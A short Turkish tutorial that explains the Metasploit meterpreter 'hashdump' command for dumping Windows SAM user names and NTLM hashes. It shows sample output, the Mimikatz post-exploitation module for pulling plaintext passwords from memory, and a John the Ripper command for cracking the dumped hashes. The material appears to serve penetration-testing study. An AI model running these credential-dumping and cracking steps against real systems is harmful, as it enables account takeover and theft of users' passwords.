🔐 hashdump Nedir? – (Metasploit Komutu)
hashdump, Metasploit içindeki meterpreter oturumu üzerinde kullanılan bir komuttur ve hedef Windows sistemindeki kullanıcı adları ve parola hash'lerini (NTLM) döker.
📌 Ne İşe Yarar?
Windows sistemlerde kullanıcı parolaları, SAM (Security Account Manager) veritabanında hashlenmiş olarak tutulur. hashdump komutu sayesinde:
Tüm kullanıcıların kullanıcı adı + SID + parola hash'leri elde edilir
Bu hash'ler daha sonra John the Ripper, Hashcat gibi araçlarla kırılabilir
🧪 Kullanımı
Metasploit'te hedefe meterpreter shell aldıktan sonra:
meterpreter > hashdump
Çıktı şu şekilde olur:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Format:
<kullanıcı_adı>:<RID>:<LM_hash>:<NTLM_hash>:::
💣 Notlar:
LM_hash genellikle boş ya da sabittir (aad3...) çünkü modern Windows'lar artık LM kullanmaz.
NTLM_hash kısmı kırılırsa düz metin parola elde edebilirsin.
⚙️ Alternatif Yöntem: Mimikatz (Daha güçlü)
use post/windows/gather/credentials/mimikatz
Bu modülle RAM'den düz metin şifreler bile çekebilirsin.
🛡️ Gereksinimler
Meterpreter oturumu
SYSTEM yetkisi (bazı durumlarda getsystem komutu çalıştırmak gerekebilir)
Antivirüs varsa bu işlemi engelleyebilir
💡 Elde Edilen Hash Nasıl Kırılır?
Örnek bir hash:
aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
John the Ripper ile kırmak için:
john --format=nt --wordlist=rockyou.txt hash.txt